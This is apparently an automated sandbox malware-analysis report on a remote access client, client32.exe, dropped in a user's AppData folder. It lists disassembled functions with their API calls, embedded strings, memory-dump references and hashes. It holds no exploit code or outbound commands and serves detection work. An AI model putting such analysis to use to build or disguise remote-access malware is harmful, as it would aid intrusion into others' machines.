                                                                                                                                                                • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                                                                                                • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                                                                                                • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                                                                                                Function 11144200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                                                                  • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bpsFyf\client32.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                                                                                                • ResetEvent.KERNEL32(00000268), ref: 11144269
                                                                                                                                                                • SetEvent.KERNEL32(00000268), ref: 1114427F
                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                                • String ID: MiniDump
                                                                                                                                                                • API String ID: 1494854734-2840755058
                                                                                                                                                                • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                                                                                • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                                                                                                • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                                                                                • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                                                                                                Function 11146DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                                                                                                • wsprintfA.USER32 ref: 11146E06
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                                                • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                                                • API String ID: 1985783259-2296142801
                                                                                                                                                                • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                                                                                • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                                                                                                • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                                                                                • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                                                                                                Function 1110F420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • _memset.LIBCMT ref: 1110F477
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                                                • API String ID: 3234921582-2664294811
                                                                                                                                                                • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                                                                                • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                                                                                                • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                                                                                • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                                                                                                Function 11145AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                                                                                                • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                                                                                                • API String ID: 1108920153-1959555903
                                                                                                                                                                • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                                                                                                • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                                                                                                • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                                                                                                • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                                                                                                Function 11031870 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 11031926
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                • String ID: %s%s.bin$562258$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                                                • API String ID: 4180936305-24552472
                                                                                                                                                                • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                                                                                                • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                                                                                                • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                                                                                                • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                                                                                                Function 11144670 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                                                                                                • __strdup.LIBCMT ref: 111446A7
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                  • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                                                                                                • _free.LIBCMT ref: 111446DC
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 398584587-0
                                                                                                                                                                • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                                                                                                • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                                                                                                • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                                                                                                • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                                                                                                Function 1100ED70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                                                                                                  • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                                                                                                • _free.LIBCMT ref: 1100EDB4
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _free.LIBCMT ref: 1100EDC7
                                                                                                                                                                • _free.LIBCMT ref: 1100EDDA
                                                                                                                                                                • _free.LIBCMT ref: 1100EDED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3515823920-0
                                                                                                                                                                • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                                                                                                • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                                                                                                • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                                                                                                • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                                                                                                Function 11145910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 1114593E
                                                                                                                                                                • wsprintfA.USER32 ref: 11145954
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                  • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                                                • API String ID: 3779116287-2600120591
                                                                                                                                                                • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                                                                                                • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                                                                                                • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
